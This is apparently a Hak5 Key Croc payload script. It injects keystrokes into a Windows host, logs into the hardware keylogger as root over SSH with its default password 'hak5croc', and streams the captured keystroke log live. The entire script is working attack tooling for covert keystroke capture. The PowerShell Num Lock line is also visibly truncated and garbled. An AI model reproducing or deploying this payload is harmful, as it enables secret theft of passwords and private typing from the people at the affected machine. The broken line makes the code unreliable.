# Title: Windows SSH # Description: Logs into key croc over ssh # Author: RootJunky / Spywill # Version: 2.0 # Category: Key Croc # # MATCH winssh # lock keyboard. Q LOCK Q GUI r sleep 1 Q STRING "powershell" Q ENTER sleep 2 # make sure num-lock is turned on as the keycroc requires this setting. Q STRING "If ([console]::NumberLock -eq \$False) {(\$wsh = New-Object -ComObject WScript.Shell) -and (\$wsh.SendKeys('{$Q ENTER sleep # connect to the KeyCroc over SSH with the device IP address. Q STRING "ssh root@" sleep 1 Q STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) sleep 1 Q ENTER sleep 1 # Enter default password Q STRING "hak5croc" Q ENTER sleep 1 # cd to loot folder and start a live key logger. Q STRING "cd loot" Q ENTER sleep 1 # press control +c to exit Q STRING echo "press control + c to exit this live key log" Q ENTER Q ENTER Q ENTER Q STRING "tail -f croc_char.log" Q ENTER Q UNLOCK # unlock keyboard. LED FINISH Q DELAY 1000 LED OFF